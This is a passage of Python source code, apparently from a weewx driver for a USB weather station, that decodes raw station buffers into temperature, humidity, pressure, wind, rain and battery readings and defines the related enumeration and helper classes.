                                               CWeatherTraits.TemperatureOFL())
        packet['outHumidity'] = get_datum_diff(data._HumidityOutdoor,
                                               CWeatherTraits.HumidityNP(),
                                               CWeatherTraits.HumidityOFL())
        packet['pressure']    = get_datum_diff(data._PressureRelative_hPa,
                                               CWeatherTraits.PressureNP(),
                                               CWeatherTraits.PressureOFL())
        packet['windSpeed']   = get_datum_diff(data._WindSpeed,
                                               CWeatherTraits.WindNP(),
                                               CWeatherTraits.WindOFL())
        packet['windGust']    = get_datum_diff(data._Gust,
                                               CWeatherTraits.WindNP(),
                                               CWeatherTraits.WindOFL())

        packet['windDir'] = getWindDir(data._WindDirection,
                                       packet['windSpeed'])
        packet['windGustDir'] = getWindDir(data._GustDirection,
                                           packet['windGust'])

        # calculated elements not directly reported by station
        packet['rainRate'] = get_datum_match(data._Rain1H,
                                             CWeatherTraits.RainNP(),
                                             CWeatherTraits.RainOFL())
        if packet['rainRate'] is not None:
            packet['rainRate'] /= 10 # weewx wants cm/hr
        rain_total = get_datum_match(data._RainTotal,
                                     CWeatherTraits.RainNP(),
                                     CWeatherTraits.RainOFL())
        delta = weewx.wxformulas.calculate_rain(rain_total, self._last_rain)
        self._last_rain = rain_total
        packet['rain'] = delta
        if packet['rain'] is not None:
            packet['rain'] /= 10 # weewx wants cm

        # track the signal strength and battery levels
        laststat = self._service.getLastStat()
        packet['rxCheckPercent'] = laststat.LastLinkQuality
        packet['windBatteryStatus'] = getBatteryStatus(
            laststat.LastBatteryStatus, 'wind')
        packet['rainBatteryStatus'] = getBatteryStatus(
            laststat.LastBatteryStatus, 'rain')
        packet['outTempBatteryStatus'] = getBatteryStatus(
            laststat.LastBatteryStatus, 'th')
        packet['inTempBatteryStatus'] = getBatteryStatus(
            laststat.LastBatteryStatus, 'console')

        return packet

    def get_config(self):
        logdbg('get station configuration')
        cfg = self._service.getConfigData().asDict()
        cs = cfg.get('checksum_out')
        if cs is None or cs == 0:
            return None
        return cfg

    def start_caching_history(self, since_ts=0, num_rec=0):
        self._service.startCachingHistory(since_ts, num_rec)

    def stop_caching_history(self):
        self._service.stopCachingHistory()

    def get_uncached_history_count(self):
        return self._service.getUncachedHistoryCount()

    def get_next_history_index(self):
        return self._service.getNextHistoryIndex()

    def get_latest_history_index(self):
        return self._service.getLatestHistoryIndex()

    def get_num_history_scanned(self):
        return self._service.getNumHistoryScanned()

    def get_history_cache_records(self):
        return self._service.getHistoryCacheRecords()

    def clear_history_cache(self):
        self._service.clearHistoryCache()

    def set_interval(self, interval):
        # FIXME: set the archive interval
        pass

# The following classes and methods are adapted from the implementation by
# eddie de pieri, which is in turn based on the HeavyWeather implementation.

class BadResponse(Exception):
    """raised when unexpected data found in frame buffer"""
    pass

class DataWritten(Exception):
    """raised when message 'data written' in frame buffer"""
    pass

class BitHandling:
    # return a nonzero result, 2**offset, if the bit at 'offset' is one.
    @staticmethod
    def testBit(int_type, offset):
        mask = 1 << offset
        return int_type & mask

    # return an integer with the bit at 'offset' set to 1.
    @staticmethod
    def setBit(int_type, offset):
        mask = 1 << offset
        return int_type | mask

    # return an integer with the bit at 'offset' set to 1.
    @staticmethod
    def setBitVal(int_type, offset, val):
        mask = val << offset
        return int_type | mask

    # return an integer with the bit at 'offset' cleared.
    @staticmethod
    def clearBit(int_type, offset):
        mask = ~(1 << offset)
        return int_type & mask

    # return an integer with the bit at 'offset' inverted, 0->1 and 1->0.
    @staticmethod
    def toggleBit(int_type, offset):
        mask = 1 << offset
        return int_type ^ mask

class EHistoryInterval:
    hi01Min          = 0
    hi05Min          = 1
    hi10Min          = 2
    hi15Min          = 3
    hi20Min          = 4
    hi30Min          = 5
    hi60Min          = 6
    hi02Std          = 7
    hi04Std          = 8
    hi06Std          = 9
    hi08Std          = 0xA
    hi12Std          = 0xB
    hi24Std          = 0xC

class EWindspeedFormat:
    wfMs             = 0
    wfKnots          = 1
    wfBFT            = 2
    wfKmh            = 3
    wfMph            = 4

class ERainFormat:
    rfMm             = 0
    rfInch           = 1

class EPressureFormat:
    pfinHg           = 0
    pfHPa            = 1

class ETemperatureFormat:
    tfFahrenheit     = 0
    tfCelsius        = 1

class EClockMode:
    ct24H            = 0
    ctAmPm           = 1

class EWeatherTendency:
    TREND_NEUTRAL    = 0
    TREND_UP         = 1
    TREND_DOWN       = 2
    TREND_ERR        = 3

class EWeatherState:
    WEATHER_BAD      = 0
    WEATHER_NEUTRAL  = 1
    WEATHER_GOOD     = 2
    WEATHER_ERR      = 3

class EWindDirection:
    wdN              = 0
    wdNNE            = 1
    wdNE             = 2
    wdENE            = 3
    wdE              = 4
    wdESE            = 5
    wdSE             = 6
    wdSSE            = 7
    wdS              = 8
    wdSSW            = 9
    wdSW             = 0x0A
    wdWSW            = 0x0B
    wdW              = 0x0C
    wdWNW            = 0x0D
    wdNW             = 0x0E
    wdNNW            = 0x0F
    wdERR            = 0x10
    wdInvalid        = 0x11
    wdNone           = 0x12

def getWindDir(wdir, wspeed):
    if wspeed is None or wspeed == 0:
        return None
    if wdir < 0 or wdir >= 16:
        return None
    return wdir * 360 / 16

class EResetMinMaxFlags:
    rmTempIndoorHi   = 0
    rmTempIndoorLo   = 1
    rmTempOutdoorHi  = 2
    rmTempOutdoorLo  = 3
    rmWindchillHi    = 4
    rmWindchillLo    = 5
    rmDewpointHi     = 6
    rmDewpointLo     = 7
    rmHumidityIndoorLo  = 8
    rmHumidityIndoorHi  = 9
    rmHumidityOutdoorLo = 0x0A
    rmHumidityOutdoorHi = 0x0B
    rmWindspeedHi    = 0x0C
    rmWindspeedLo    = 0x0D
    rmGustHi         = 0x0E
    rmGustLo         = 0x0F
    rmPressureLo     = 0x10
    rmPressureHi     = 0x11
    rmRain1hHi       = 0x12
    rmRain24hHi      = 0x13
    rmRainLastWeekHi  = 0x14
    rmRainLastMonthHi = 0x15
    rmRainTotal      = 0x16
    rmInvalid        = 0x17

class ERequestType:
    rtGetCurrent     = 0
    rtGetHistory     = 1
    rtGetConfig      = 2
    rtSetConfig      = 3
    rtSetTime        = 4
    rtFirstConfig    = 5
    rtINVALID        = 6

class EAction:
    aGetHistory      = 0
    aReqSetTime      = 1
    aReqSetConfig    = 2
    aGetConfig       = 3
    aGetCurrent      = 5
    aSendTime        = 0xc0
    aSendConfig      = 0x40

class ERequestState:
    rsQueued         = 0
    rsRunning        = 1
    rsFinished       = 2
    rsPreamble       = 3
    rsWaitDevice     = 4
    rsWaitConfig     = 5
    rsError          = 6
    rsChanged        = 7
    rsINVALID        = 8

class EResponseType:
    rtDataWritten       = 0x20
    rtGetConfig         = 0x40
    rtGetCurrentWeather = 0x60
    rtGetHistory        = 0x80
    rtRequest           = 0xa0
    rtReqFirstConfig    = 0xa1
    rtReqSetConfig      = 0xa2
    rtReqSetTime        = 0xa3

# frequency standards and their associated transmission frequencies
class EFrequency:
    fsUS             = 'US'
    tfUS             = 905000000
    fsEU             = 'EU'
    tfEU             = 868300000

def getFrequency(standard):
    if standard == EFrequency.fsUS:
        return EFrequency.tfUS
    elif standard == EFrequency.fsEU:
        return EFrequency.tfEU
    logerr("unknown frequency standard '%s', using US" % standard)
    return EFrequency.tfUS

def getFrequencyStandard(frequency):
    if frequency == EFrequency.tfUS:
        return EFrequency.fsUS
    elif frequency == EFrequency.tfEU:
        return EFrequency.fsEU
    logerr("unknown frequency '%s', using US" % frequency)
    return EFrequency.fsUS

# HWPro presents battery flags as WS/TH/RAIN/WIND
# 0 - wind
# 1 - rain
# 2 - thermo-hygro
# 3 - console

batterybits = {'wind':0, 'rain':1, 'th':2, 'console':3}

def getBatteryStatus(status, flag):
    """Return 1 if bit is set, 0 otherwise"""
    bit = batterybits.get(flag)
    if bit is None:
        return None
    if BitHandling.testBit(status, bit):
        return 1
    return 0

history_intervals = {
    EHistoryInterval.hi01Min: 1,
    EHistoryInterval.hi05Min: 5,
    EHistoryInterval.hi10Min: 10,
    EHistoryInterval.hi20Min: 20,
    EHistoryInterval.hi30Min: 30,
    EHistoryInterval.hi60Min: 60,
    EHistoryInterval.hi02Std: 120,
    EHistoryInterval.hi04Std: 240,
    EHistoryInterval.hi06Std: 360,
    EHistoryInterval.hi08Std: 480,
    EHistoryInterval.hi12Std: 720,
    EHistoryInterval.hi24Std: 1440,
    }

def getHistoryInterval(i):
    return history_intervals.get(i)

# NP - not present
# OFL - outside factory limits
class CWeatherTraits(object):
    windDirMap = {
        0: "N", 1: "NNE", 2: "NE", 3: "ENE", 4: "E", 5: "ESE", 6: "SE",
        7: "SSE", 8: "S", 9: "SSW", 10: "SW", 11: "WSW", 12: "W",
        13: "WNW", 14: "NW", 15: "NWN", 16: "err", 17: "inv", 18: "None" }
    forecastMap = {
        0: "Rainy(Bad)", 1: "Cloudy(Neutral)", 2: "Sunny(Good)",  3: "Error" }
    trendMap = {
        0: "Stable(Neutral)", 1: "Rising(Up)", 2: "Falling(Down)", 3: "Error" }

    @staticmethod
    def TemperatureNP():
        return 81.099998

    @staticmethod
    def TemperatureOFL():
        return 136.0

    @staticmethod
    def PressureNP():
        return 10101010.0

    @staticmethod
    def PressureOFL():
        return 16666.5

    @staticmethod
    def HumidityNP():
        return 110.0

    @staticmethod
    def HumidityOFL():
        return 121.0

    @staticmethod
    def RainNP():
        return -0.2

    @staticmethod
    def RainOFL():
        return 16666.664

    @staticmethod
    def WindNP():
        return 183.6 # km/h = 51.0 m/s

    @staticmethod
    def WindOFL():
        return 183.96 # km/h = 51.099998 m/s

    @staticmethod
    def TemperatureOffset():
        return 40.0

class CMeasurement:
    _Value = 0.0
    _ResetFlag = 23
    _IsError = 1
    _IsOverflow = 1
    _Time = None

    def Reset(self):
        self._Value = 0.0
        self._ResetFlag = 23
        self._IsError = 1
        self._IsOverflow = 1

class CMinMaxMeasurement(object):
    def __init__(self):
        self._Min = CMeasurement()
        self._Max = CMeasurement()

# firmware XXX has bogus date values for these fields
_bad_labels = ['RainLastMonthMax','RainLastWeekMax','PressureRelativeMin']

class USBHardware(object):
    @staticmethod
    def isOFL2(buf, start, StartOnHiNibble):
        if StartOnHiNibble:
            result = (buf[0][start+0] >>  4) == 15 \
                or (buf[0][start+0] & 0xF) == 15
        else:
            result = (buf[0][start+0] & 0xF) == 15 \
                or (buf[0][start+1] >>  4) == 15
        return result

    @staticmethod
    def isOFL3(buf, start, StartOnHiNibble):
        if StartOnHiNibble:
            result = (buf[0][start+0] >>  4) == 15 \
                or (buf[0][start+0] & 0xF) == 15 \
                or (buf[0][start+1] >>  4) == 15
        else:
            result = (buf[0][start+0] & 0xF) == 15 \
                or (buf[0][start+1] >>  4) == 15 \
                or (buf[0][start+1] & 0xF) == 15
        return result

    @staticmethod
    def isOFL5(buf, start, StartOnHiNibble):
        if StartOnHiNibble:
            result = (buf[0][start+0] >>  4) == 15 \
                or (buf[0][start+0] & 0xF) == 15 \
                or (buf[0][start+1] >>  4) == 15 \
                or (buf[0][start+1] & 0xF) == 15 \
                or (buf[0][start+2] >>  4) == 15
        else:
            result = (buf[0][start+0] & 0xF) == 15 \
                or (buf[0][start+1] >>  4) == 15 \
                or (buf[0][start+1] & 0xF) == 15 \
                or (buf[0][start+2] >>  4) == 15 \
                or (buf[0][start+2] & 0xF) == 15
        return result

    @staticmethod
    def isErr2(buf, start, StartOnHiNibble):
        if StartOnHiNibble:
            result = (buf[0][start+0] >>  4) >= 10 \
                and (buf[0][start+0] >>  4) != 15 \
                or  (buf[0][start+0] & 0xF) >= 10 \
                and (buf[0][start+0] & 0xF) != 15
        else:
            result = (buf[0][start+0] & 0xF) >= 10 \
                and (buf[0][start+0] & 0xF) != 15 \
                or  (buf[0][start+1] >>  4) >= 10 \
                and (buf[0][start+1] >>  4) != 15
        return result
        
    @staticmethod
    def isErr3(buf, start, StartOnHiNibble):
        if StartOnHiNibble:
            result = (buf[0][start+0] >>  4) >= 10 \
                and (buf[0][start+0] >>  4) != 15 \
                or  (buf[0][start+0] & 0xF) >= 10 \
                and (buf[0][start+0] & 0xF) != 15 \
                or  (buf[0][start+1] >>  4) >= 10 \
                and (buf[0][start+1] >>  4) != 15
        else:
            result = (buf[0][start+0] & 0xF) >= 10 \
                and (buf[0][start+0] & 0xF) != 15 \
                or  (buf[0][start+1] >>  4) >= 10 \
                and (buf[0][start+1] >>  4) != 15 \
                or  (buf[0][start+1] & 0xF) >= 10 \
                and (buf[0][start+1] & 0xF) != 15
        return result
        
    @staticmethod
    def isErr5(buf, start, StartOnHiNibble):
        if StartOnHiNibble:
            result = (buf[0][start+0] >>  4) >= 10 \
                and (buf[0][start+0] >>  4) != 15 \
                or  (buf[0][start+0] & 0xF) >= 10 \
                and (buf[0][start+0] & 0xF) != 15 \
                or  (buf[0][start+1] >>  4) >= 10 \
                and (buf[0][start+1] >>  4) != 15 \
                or  (buf[0][start+1] & 0xF) >= 10 \
                and (buf[0][start+1] & 0xF) != 15 \
                or  (buf[0][start+2] >>  4) >= 10 \
                and (buf[0][start+2] >>  4) != 15
        else:
            result = (buf[0][start+0] & 0xF) >= 10 \
                and (buf[0][start+0] & 0xF) != 15 \
                or  (buf[0][start+1] >>  4) >= 10 \
                and (buf[0][start+1] >>  4) != 15 \
                or  (buf[0][start+1] & 0xF) >= 10 \
                and (buf[0][start+1] & 0xF) != 15 \
                or  (buf[0][start+2] >>  4) >= 10 \
                and (buf[0][start+2] >>  4) != 15 \
                or  (buf[0][start+2] & 0xF) >= 10 \
                and (buf[0][start+2] & 0xF) != 15
        return result

    @staticmethod
    def reverseByteOrder(buf, start, Count):
        nbuf=buf[0]
        for i in xrange(0, Count >> 1):
            tmp = nbuf[start + i]
            nbuf[start + i] = nbuf[start + Count - i - 1]
            nbuf[start + Count - i - 1 ] = tmp
        buf[0]=nbuf

    @staticmethod
    def readWindDirectionShared(buf, start):
        return (buf[0][0+start] & 0xF, buf[0][start] >> 4)

    @staticmethod
    def toInt_2(buf, start, StartOnHiNibble):
        """read 2 nibbles"""
        if StartOnHiNibble:
            rawpre  = (buf[0][start+0] >>  4)* 10 \
                + (buf[0][start+0] & 0xF)* 1
        else:
            rawpre  = (buf[0][start+0] & 0xF)* 10 \
                + (buf[0][start+1] >>  4)* 1
        return rawpre

    @staticmethod
    def toRain_7_3(buf, start, StartOnHiNibble):
        """read 7 nibbles, presentation with 3 decimals; units of mm"""
        if (USBHardware.isErr2(buf, start+0, StartOnHiNibble) or
            USBHardware.isErr5(buf, start+1, StartOnHiNibble)):
            result = CWeatherTraits.RainNP()
        elif (USBHardware.isOFL2(buf, start+0, StartOnHiNibble) or
              USBHardware.isOFL5(buf, start+1, StartOnHiNibble)):
            result = CWeatherTraits.RainOFL()
        elif StartOnHiNibble:
            result  = (buf[0][start+0] >>  4)*  1000 \
                + (buf[0][start+0] & 0xF)* 100    \
                + (buf[0][start+1] >>  4)*  10    \
                + (buf[0][start+1] & 0xF)*   1    \
                + (buf[0][start+2] >>  4)*   0.1  \
                + (buf[0][start+2] & 0xF)*   0.01 \
                + (buf[0][start+3] >>  4)*   0.001
        else:
            result  = (buf[0][start+0] & 0xF)*  1000 \
                + (buf[0][start+1] >>  4)* 100    \
                + (buf[0][start+1] & 0xF)*  10    \
                + (buf[0][start+2] >>  4)*   1    \
                + (buf[0][start+2] & 0xF)*   0.1  \
                + (buf[0][start+3] >>  4)*   0.01 \
                + (buf[0][start+3] & 0xF)*   0.001
        return result

    @staticmethod
    def toRain_6_2(buf, start, StartOnHiNibble):
        '''read 6 nibbles, presentation with 2 decimals; units of mm'''
        if (USBHardware.isErr2(buf, start+0, StartOnHiNibble) or
            USBHardware.isErr2(buf, start+1, StartOnHiNibble) or
            USBHardware.isErr2(buf, start+2, StartOnHiNibble) ):
            result = CWeatherTraits.RainNP()
        elif (USBHardware.isOFL2(buf, start+0, StartOnHiNibble) or
              USBHardware.isOFL2(buf, start+1, StartOnHiNibble) or
              USBHardware.isOFL2(buf, start+2, StartOnHiNibble)):
            result = CWeatherTraits.RainOFL()
        elif StartOnHiNibble:
            result  = (buf[0][start+0] >>  4)*  1000 \
                + (buf[0][start+0] & 0xF)* 100   \
                + (buf[0][start+1] >>  4)*  10   \
                + (buf[0][start+1] & 0xF)*   1   \
                + (buf[0][start+2] >>  4)*   0.1 \
                + (buf[0][start+2] & 0xF)*   0.01
        else:
            result  = (buf[0][start+0] & 0xF)*  1000 \
                + (buf[0][start+1] >>  4)* 100   \
                + (buf[0][start+1] & 0xF)*  10   \
                + (buf[0][start+2] >>  4)*   1   \
                + (buf[0][start+2] & 0xF)*   0.1 \
                + (buf[0][start+3] >>  4)*   0.01
        return result

    @staticmethod
    def toRain_3_1(buf, start, StartOnHiNibble):
        """read 3 nibbles, presentation with 1 decimal; units of 0.1 inch"""
        if StartOnHiNibble:
            hibyte = buf[0][start+0]
            lobyte = (buf[0][start+1] >> 4) & 0xF
        else:
            hibyte = 16*(buf[0][start+0] & 0xF) + ((buf[0][start+1] >> 4) & 0xF)
            lobyte = buf[0][start+1] & 0xF            
        if hibyte == 0xFF and lobyte == 0xE :
            result = CWeatherTraits.RainNP()
        elif hibyte == 0xFF and lobyte == 0xF :
            result = CWeatherTraits.RainOFL()
        else:
            val = USBHardware.toFloat_3_1(buf, start, StartOnHiNibble) # 0.1 inch
            result = val * 2.54 # mm
        return result

    @staticmethod  
    def toFloat_3_1(buf, start, StartOnHiNibble):
        """read 3 nibbles, presentation with 1 decimal"""
        if StartOnHiNibble:
            result = (buf[0][start+0] >>  4)*16**2 \
                + (buf[0][start+0] & 0xF)*   16**1 \
                + (buf[0][start+1] >>  4)*   16**0
        else:
            result = (buf[0][start+0] & 0xF)*16**2 \
                + (buf[0][start+1] >>  4)*   16**1 \
                + (buf[0][start+1] & 0xF)*   16**0
        result = result / 10.0
        return result

    @staticmethod
    def toDateTime(buf, start, StartOnHiNibble, label):
        """read 10 nibbles, presentation as DateTime"""
        result = None
        if (USBHardware.isErr2(buf, start+0, StartOnHiNibble)
            or USBHardware.isErr2(buf, start+1, StartOnHiNibble)
            or USBHardware.isErr2(buf, start+2, StartOnHiNibble)
            or USBHardware.isErr2(buf, start+3, StartOnHiNibble)
            or USBHardware.isErr2(buf, start+4, StartOnHiNibble)):
            logerr('ToDateTime: bogus date for %s: error status in buffer' %
                   label)
        else:
            year    = USBHardware.toInt_2(buf, start+0, StartOnHiNibble) + 2000
            month   = USBHardware.toInt_2(buf, start+1, StartOnHiNibble)
            days    = USBHardware.toInt_2(buf, start+2, StartOnHiNibble)
            hours   = USBHardware.toInt_2(buf, start+3, StartOnHiNibble)
            minutes = USBHardware.toInt_2(buf, start+4, StartOnHiNibble)
            try:
                result = datetime(year, month, days, hours, minutes)
            except ValueError:
                if label not in _bad_labels:
                    logerr(('ToDateTime: bogus date for %s:'
                            ' bad date conversion from'
                            ' %s %s %s %s %s') %
                           (label, minutes, hours, days, month, year))
        if result is None:
            # FIXME: use None instead of a really old date to indicate invalid
            result = datetime(1900, 01, 01, 00, 00)
        return result

    @staticmethod
    def toHumidity_2_0(buf, start, StartOnHiNibble):
        """read 2 nibbles, presentation with 0 decimal"""
        if USBHardware.isErr2(buf, start+0, StartOnHiNibble):
            result = CWeatherTraits.HumidityNP()
        elif USBHardware.isOFL2(buf, start+0, StartOnHiNibble):
            result = CWeatherTraits.HumidityOFL()
        else:
            result = USBHardware.toInt_2(buf, start, StartOnHiNibble)
        return result

    @staticmethod
    def toTemperature_5_3(buf, start, StartOnHiNibble):
        """read 5 nibbles, presentation with 3 decimals; units of degree C"""
        if USBHardware.isErr5(buf, start+0, StartOnHiNibble):
            result = CWeatherTraits.TemperatureNP()
        elif USBHardware.isOFL5(buf, start+0, StartOnHiNibble):
            result = CWeatherTraits.TemperatureOFL()
        else:
            if StartOnHiNibble:
                rawtemp = (buf[0][start+0] >>  4)* 10 \
                    + (buf[0][start+0] & 0xF)*  1     \
                    + (buf[0][start+1] >>  4)*  0.1   \
                    + (buf[0][start+1] & 0xF)*  0.01  \
                    + (buf[0][start+2] >>  4)*  0.001
            else:
                rawtemp = (buf[0][start+0] & 0xF)* 10 \
                    + (buf[0][start+1] >>  4)*  1     \
                    + (buf[0][start+1] & 0xF)*  0.1   \
                    + (buf[0][start+2] >>  4)*  0.01  \
                    + (buf[0][start+2] & 0xF)*  0.001
            result = rawtemp - CWeatherTraits.TemperatureOffset()
        return result

    @staticmethod
    def toTemperature_3_1(buf, start, StartOnHiNibble):
        """read 3 nibbles, presentation with 1 decimal; units of degree C"""
        if USBHardware.isErr3(buf, start+0, StartOnHiNibble):
            result = CWeatherTraits.TemperatureNP()
        elif USBHardware.isOFL3(buf, start+0, StartOnHiNibble):
            result = CWeatherTraits.TemperatureOFL()
        else:
            if StartOnHiNibble :
                rawtemp   =  (buf[0][start+0] >>  4)*  10 \
                    +  (buf[0][start+0] & 0xF)*  1   \
                    +  (buf[0][start+1] >>  4)*  0.1
            else:
                rawtemp   =  (buf[0][start+0] & 0xF)*  10 \
                    +  (buf[0][start+1] >>  4)*  1   \
                    +  (buf[0][start+1] & 0xF)*  0.1 
            result = rawtemp - CWeatherTraits.TemperatureOffset()
        return result

    @staticmethod
    def toWindspeed_6_2(buf, start):
        """read 6 nibbles, presentation with 2 decimals; units of km/h"""
        result = (buf[0][start+0] >> 4)* 16**5 \
            + (buf[0][start+0] & 0xF)*   16**4 \
            + (buf[0][start+1] >>  4)*   16**3 \
            + (buf[0][start+1] & 0xF)*   16**2 \
            + (buf[0][start+2] >>  4)*   16**1 \
            + (buf[0][start+2] & 0xF)
        result /= 256.0
        result /= 100.0             # km/h
        return result

    @staticmethod
    def toWindspeed_3_1(buf, start, StartOnHiNibble):
        """read 3 nibbles, presentation with 1 decimal; units of m/s"""
        if StartOnHiNibble :
            hibyte = buf[0][start+0]
            lobyte = (buf[0][start+1] >> 4) & 0xF
        else:
            hibyte = 16*(buf[0][start+0] & 0xF) + ((buf[0][start+1] >> 4) & 0xF)
            lobyte = buf[0][start+1] & 0xF            
        if hibyte == 0xFF and lobyte == 0xE:
            result = CWeatherTraits.WindNP()
        elif hibyte == 0xFF and lobyte == 0xF:
            result = CWeatherTraits.WindOFL()
        else:
            result = USBHardware.toFloat_3_1(buf, start, StartOnHiNibble) # m/s
            result *= 3.6 # km/h
        return result

    @staticmethod
    def readPressureShared(buf, start, StartOnHiNibble):
        return (USBHardware.toPressure_hPa_5_1(buf,start+2,1-StartOnHiNibble),
                USBHardware.toPressure_inHg_5_2(buf,start,StartOnHiNibble))

    @staticmethod
    def toPressure_hPa_5_1(buf, start, StartOnHiNibble):
        """read 5 nibbles, presentation with 1 decimal; units of hPa (mbar)"""
        if USBHardware.isErr5(buf, start+0, StartOnHiNibble):
            result = CWeatherTraits.PressureNP()
        elif USBHardware.isOFL5(buf, start+0, StartOnHiNibble):
            result = CWeatherTraits.PressureOFL()
        elif StartOnHiNibble :
            result = (buf[0][start+0] >> 4)* 1000 \
                + (buf[0][start+0] & 0xF)* 100  \
                + (buf[0][start+1] >>  4)*  10  \
                + (buf[0][start+1] & 0xF)*  1   \
                + (buf[0][start+2] >>  4)*  0.1
        else:
            result = (buf[0][start+0] & 0xF)* 1000 \
                + (buf[0][start+1] >>  4)* 100  \
                + (buf[0][start+1] & 0xF)*  10  \
                + (buf[0][start+2] >>  4)*  1   \
                + (buf[0][start+2] & 0xF)*  0.1
        return result

    @staticmethod
    def toPressure_inHg_5_2(buf, start, StartOnHiNibble):
        """read 5 nibbles, presentation with 2 decimals; units of inHg"""
        if USBHardware.isErr5(buf, start+0, StartOnHiNibble):
            result = CWeatherTraits.PressureNP()
        elif USBHardware.isOFL5(buf, start+0, StartOnHiNibble):
            result = CWeatherTraits.PressureOFL()
        elif StartOnHiNibble :
            result = (buf[0][start+0] >> 4)* 100 \
                + (buf[0][start+0] & 0xF)* 10   \
                + (buf[0][start+1] >>  4)*  1   \
                + (buf[0][start+1] & 0xF)*  0.1 \
                + (buf[0][start+2] >>  4)*  0.01
        else:
            result = (buf[0][start+0] & 0xF)* 100 \
                + (buf[0][start+1] >>  4)* 10   \
                + (buf[0][start+1] & 0xF)*  1   \
                + (buf[0][start+2] >>  4)*  0.1 \
                + (buf[0][start+2] & 0xF)*  0.01
        return result


class CCurrentWeatherData(object):

    def __init__(self):
        self._timestamp = None
        self._checksum = None
        self._PressureRelative_hPa = CWeatherTraits.PressureNP()
        self._PressureRelative_hPaMinMax = CMinMaxMeasurement()
        self._PressureRelative_inHg = CWeatherTraits.PressureNP()
        self._PressureRelative_inHgMinMax = CMinMaxMeasurement()
        self._WindSpeed = CWeatherTraits.WindNP()
        self._WindDirection = EWindDirection.wdNone
        self._WindDirection1 = EWindDirection.wdNone
        self._WindDirection2 = EWindDirection.wdNone
        self._WindDirection3 = EWindDirection.wdNone
        self._WindDirection4 = EWindDirection.wdNone
        self._WindDirection5 = EWindDirection.wdNone
        self._Gust = CWeatherTraits.WindNP()
        self._GustMax = CMinMaxMeasurement()
        self._GustDirection = EWindDirection.wdNone
        self._GustDirection1 = EWindDirection.wdNone
        self._GustDirection2 = EWindDirection.wdNone
        self._GustDirection3 = EWindDirection.wdNone
        self._GustDirection4 = EWindDirection.wdNone
        self._GustDirection5 = EWindDirection.wdNone
        self._Rain1H = CWeatherTraits.RainNP()
        self._Rain1HMax = CMinMaxMeasurement()
        self._Rain24H = CWeatherTraits.RainNP()
        self._Rain24HMax = CMinMaxMeasurement()
        self._RainLastWeek = CWeatherTraits.RainNP()
        self._RainLastWeekMax = CMinMaxMeasurement()
        self._RainLastMonth = CWeatherTraits.RainNP()
        self._RainLastMonthMax = CMinMaxMeasurement()
        self._RainTotal = CWeatherTraits.RainNP()
        self._LastRainReset = None
        self._TempIndoor = CWeatherTraits.TemperatureNP()
        self._TempIndoorMinMax = CMinMaxMeasurement()
        self._TempOutdoor = CWeatherTraits.TemperatureNP()
        self._TempOutdoorMinMax = CMinMaxMeasurement()
        self._HumidityIndoor = CWeatherTraits.HumidityNP()
        self._HumidityIndoorMinMax = CMinMaxMeasurement()
        self._HumidityOutdoor = CWeatherTraits.HumidityNP()
        self._HumidityOutdoorMinMax = CMinMaxMeasurement()
        self._Dewpoint = CWeatherTraits.TemperatureNP()
        self._DewpointMinMax = CMinMaxMeasurement()
        self._Windchill = CWeatherTraits.TemperatureNP()
        self._WindchillMinMax = CMinMaxMeasurement()
        self._WeatherState = EWeatherState.WEATHER_ERR
        self._WeatherTendency = EWeatherTendency.TREND_ERR
        self._AlarmRingingFlags = 0
        self._AlarmMarkedFlags = 0
        self._PresRel_hPa_Max = 0.0
        self._PresRel_inHg_Max = 0.0

    @staticmethod
    def calcChecksum(buf):
        return calc_checksum(buf, 6)

    def checksum(self):
        return self._checksum

    def read(self, buf):
        self._timestamp = int(time.time() + 0.5)
        self._checksum = CCurrentWeatherData.calcChecksum(buf)

        nbuf = [0]
        nbuf[0] = buf[0]
        self._StartBytes = nbuf[0][6]*0xF + nbuf[0][7] # FIXME: what is this?
        self._WeatherTendency = (nbuf[0][8] >> 4) & 0xF
        if self._WeatherTendency > 3:
            self._WeatherTendency = 3 
        self._WeatherState = nbuf[0][8] & 0xF
        if self._WeatherState > 3:
            self._WeatherState = 3 

        self._TempIndoorMinMax._Max._Value = USBHardware.toTemperature_5_3(nbuf, 19, 0)
        self._TempIndoorMinMax._Min._Value = USBHardware.toTemperature_5_3(nbuf, 22, 1)
        self._TempIndoor = USBHardware.toTemperature_5_3(nbuf, 24, 0)
        self._TempIndoorMinMax._Min._IsError = (self._TempIndoorMinMax._Min._Value == CWeatherTraits.TemperatureNP())
        self._TempIndoorMinMax._Min._IsOverflow = (self._TempIndoorMinMax._Min._Value == CWeatherTraits.TemperatureOFL())
        self._TempIndoorMinMax._Max._IsError = (self._TempIndoorMinMax._Max._Value == CWeatherTraits.TemperatureNP())
        self._TempIndoorMinMax._Max._IsOverflow = (self._TempIndoorMinMax._Max._Value == CWeatherTraits.TemperatureOFL())
        self._TempIndoorMinMax._Max._Time = None if self._TempIndoorMinMax._Max._IsError or self._TempIndoorMinMax._Max._IsOverflow else USBHardware.toDateTime(nbuf, 9, 0, 'TempIndoorMax')
        self._TempIndoorMinMax._Min._Time = None if self._TempIndoorMinMax._Min._IsError or self._TempIndoorMinMax._Min._IsOverflow else USBHardware.toDateTime(nbuf, 14, 0, 'TempIndoorMin')

        self._TempOutdoorMinMax._Max._Value = USBHardware.toTemperature_5_3(nbuf, 37, 0)
        self._TempOutdoorMinMax._Min._Value = USBHardware.toTemperature_5_3(nbuf, 40, 1)
        self._TempOutdoor = USBHardware.toTemperature_5_3(nbuf, 42, 0)
        self._TempOutdoorMinMax._Min._IsError = (self._TempOutdoorMinMax._Min._Value == CWeatherTraits.TemperatureNP())
        self._TempOutdoorMinMax._Min._IsOverflow = (self._TempOutdoorMinMax._Min._Value == CWeatherTraits.TemperatureOFL())
        self._TempOutdoorMinMax._Max._IsError = (self._TempOutdoorMinMax._Max._Value == CWeatherTraits.TemperatureNP())
        self._TempOutdoorMinMax._Max._IsOverflow = (self._TempOutdoorMinMax._Max._Value == CWeatherTraits.TemperatureOFL())
        self._TempOutdoorMinMax._Max._Time = None if self._TempOutdoorMinMax._Max._IsError or self._TempOutdoorMinMax._Max._IsOverflow else USBHardware.toDateTime(nbuf, 27, 0, 'TempOutdoorMax')
        self._TempOutdoorMinMax._Min._Time = None if self._TempOutdoorMinMax._Min._IsError or self._TempOutdoorMinMax._Min._IsOverflow else USBHardware.toDateTime(nbuf, 32, 0, 'TempOutdoorMin')

        self._WindchillMinMax._Max._Value = USBHardware.toTemperature_5_3(nbuf, 55, 0)
        self._WindchillMinMax._Min._Value = USBHardware.toTemperature_5_3(nbuf, 58, 1)
        self._Windchill = USBHardware.toTemperature_5_3(nbuf, 60, 0)
